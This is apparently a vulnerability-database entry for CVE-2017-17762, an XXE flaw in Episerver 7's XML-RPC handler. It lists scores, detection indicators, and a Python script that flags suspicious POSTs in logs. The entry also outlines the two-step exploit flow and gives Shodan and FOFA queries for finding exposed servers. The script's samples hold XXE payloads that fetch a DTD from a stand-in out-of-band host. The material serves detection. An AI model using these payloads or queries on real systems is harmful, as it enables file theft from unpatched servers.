CVE-2017-17762
published 2018-08-29


Priority: P2 · 77 · high
CVSS 3.0: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 4.65% (90.6th percentile)

XML external entity (XXE) vulnerability in Episerver 7 patch 4 and earlier allows remote attackers to read arbitrary files via a crafted DTD in an XML request involving util/xmlrpc/Handler.ashx.

Affected

2 ranges

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| episerver | episerver | <= 7 | |
| episerver | episerver | | |

Detection & IOCs (extracted from sources)

url: /util/xmlrpc/Handler.ashx
path: /util/xmlrpc/Handler.ashx
command: POST /util/xmlrpc/Handler.ashx HTTP/1.1 Content-Type: text/xml Accept: */*
sigma: shodan-query: http.html:"episerver" OR http.html:"epihash"
  • Probe for CVE-2017-17762 by first issuing a GET to /util/xmlrpc/Handler.ashx and confirming the response body contains 'EPiServer' with HTTP 200, then sending a malicious XML POST with an out-of-band XXE payload to the same endpoint.
  • Exploitation confirmation: a successful out-of-band XXE is indicated by an inbound DNS interaction (interactsh/OOB callback) combined with an HTTP 200 or 500 response from the target endpoint.
  • Hunt for exposed Episerver instances using Shodan queries for 'http.html:episerver', 'http.html:epihash', or the CPE string 'cpe:2.3:a:episerver:episerver', and FOFA queries for 'body=episerver' or 'body=epihash'.
  • The attack vector is a crafted DTD embedded in an XML POST body sent to /util/xmlrpc/Handler.ashx; monitor for XML POST requests to this path containing DOCTYPE declarations with SYSTEM or ENTITY keywords as an indicator of XXE exploitation attempts.
  • The Nuclei template uses an out-of-band (OOB/interactsh) DNS callback to confirm blind XXE; a DNS interaction alone is the confirmation signal, and no direct file content is returned in-band.
  • The exploit flow is two-step: step 1 fingerprints the host (GET + body check for 'EPiServer'), and step 2 fires the XXE payload only if step 1 succeeds. Both conditions must be met for a true positive.
  • An HTTP 500 response on the POST is treated as a valid exploitation indicator alongside HTTP 200, so error responses should not be dismissed during detection.
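
The monitoring rule from the bullets above, as an added example (not code from the Nuclei template or from any vendor rule): it flags POSTs to the endpoint whose body carries a DOCTYPE with ENTITY or SYSTEM, and marks 200/500 responses for correlation with the server's outbound DNS logs. The record layout, function names and sample requests are constructed for illustration; the UTF-16 handling goes beyond what the page states.

```python
import re
from urllib.parse import urlsplit

# Endpoint named on this page, lower-cased because IIS matches paths case-insensitively.
ENDPOINT = "/util/xmlrpc/handler.ashx"
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)
KEYWORD_RE = re.compile(r"<!ENTITY\b|\bSYSTEM\b", re.I)

def normalize(body: bytes) -> str:
    """Decode the body so a UTF-16 encoded document cannot slip past a byte match."""
    if body[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return body.decode("utf-16", errors="replace")
    return body.decode("utf-8", errors="replace")

def classify(method: str, url: str, status: int, body: bytes):
    """Return None, 'attempt', or 'attempt+correlate-dns' for one logged request."""
    if method.upper() != "POST" or urlsplit(url).path.lower() != ENDPOINT:
        return None
    text = normalize(body)
    if not (DOCTYPE_RE.search(text) and KEYWORD_RE.search(text)):
        return None
    # The page treats 200 and 500 alike; confirm via the server's outbound DNS logs.
    return "attempt+correlate-dns" if status in (200, 500) else "attempt"

def scan(records):
    """Return (index, verdict) for every record that matches."""
    hits = []
    for i, rec in enumerate(records):
        verdict = classify(*rec)
        if verdict:
            hits.append((i, verdict))
    return hits

# Constructed sample records: (method, url, response status, request body).
DTD16 = '<?xml version="1.0" encoding="utf-16"?><!DOCTYPE r SYSTEM "http://oob.invalid/x.dtd"><r/>'
SAMPLES = [
    ("GET", "/util/xmlrpc/Handler.ashx", 200, b""),
    ("POST", "/util/xmlrpc/Handler.ashx", 200,
     b"<?xml version='1.0'?><methodCall><methodName>example.ping</methodName></methodCall>"),
    ("POST", "/Util/XmlRpc/handler.ashx?x=1", 500,
     b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % e SYSTEM "http://oob.invalid/">]><r/>'),
    ("POST", "/util/xmlrpc/Handler.ashx", 404, DTD16.encode("utf-16")),
    ("POST", "/other.ashx", 200, b'<!DOCTYPE r SYSTEM "http://oob.invalid/x.dtd"><r/>'),
]

if __name__ == "__main__":
    for index, verdict in scan(SAMPLES):
        print(index, verdict, SAMPLES[index][1])
```

Ordinary XML-RPC calls have no need for a DOCTYPE, so a match on this path is worth triage even when the response is an error.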

CVSS provenance

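| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 7.5 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
| vulncheck | | 7.5 | HIGH | |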